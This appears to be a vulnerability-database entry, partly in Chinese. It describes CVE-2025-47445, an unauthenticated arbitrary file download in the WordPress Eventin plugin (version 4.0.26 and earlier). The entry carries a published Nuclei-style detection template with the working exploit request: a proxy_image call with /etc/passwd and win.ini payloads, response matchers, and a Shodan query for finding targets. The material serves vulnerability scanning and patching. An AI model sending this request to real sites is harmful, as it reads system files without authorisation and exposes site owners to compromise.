漏洞描述
Themewinter Eventin contains a path traversal caused by relative path manipulation, letting attackers access arbitrary files on the server, exploit requires no specific privileges or user interaction.
CVE-2025-47445: WordPress Eventin (Themewinter) ≤ 4.0.26 - Arbitrary File Download
PoC代码[已公开]
id: CVE-2025-47445
info:
name: WordPress Eventin (Themewinter) ≤ 4.0.26 - Arbitrary File Download
author: hnd3884
severity: high
description: |
Themewinter Eventin contains a path traversal caused by relative path manipulation, letting attackers access arbitrary files on the server, exploit requires no specific privileges or user interaction.
impact: |
Attackers can access sensitive files on the server, potentially leading to information disclosure or system compromise.
remediation: |
Update to the latest version of Eventin, version 4.0.27 or later.
reference:
- https://patchstack.com/database/wordpress/plugin/wp-event-solution/vulnerability/wordpress-eventin-4-0-26-arbitrary-file-download-vulnerability?_s_id=cve
- https://github.com/advisories/GHSA-c3pr-284f-8x9f
- https://nvd.nist.gov/vuln/detail/CVE-2025-47445
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2025-47445
cwe-id: CWE-23
epss-score: 0.05925
epss-percentile: 0.90267
cpe: cpe:2.3:a:themewinter:eventin:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: themewinter
shodan-query: html:"wp-event-solution"
tags: cve,cve2025,wordpress,wp,wp-plugin,eventin,lfi,wp-event-solution,vkev
http:
- raw:
- |
POST /wp-admin/admin-ajax.php?action=proxy_image&url={{path}} HTTP/1.1
Host: {{Hostname}}
payloads:
path:
- /etc/passwd
- /windows/win.ini
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: status
status:
- 400
# digest: 490a00463044022057a31e09d9e8d892e86d260f11a1907d4943c16ae52ddc0341ebd29a289749210220600d4beb8ae1cc5b6ce656b24cefb35d43c6810fd96ed12280aa6b870e187836:922c64590222798bb761d5b6d8e72950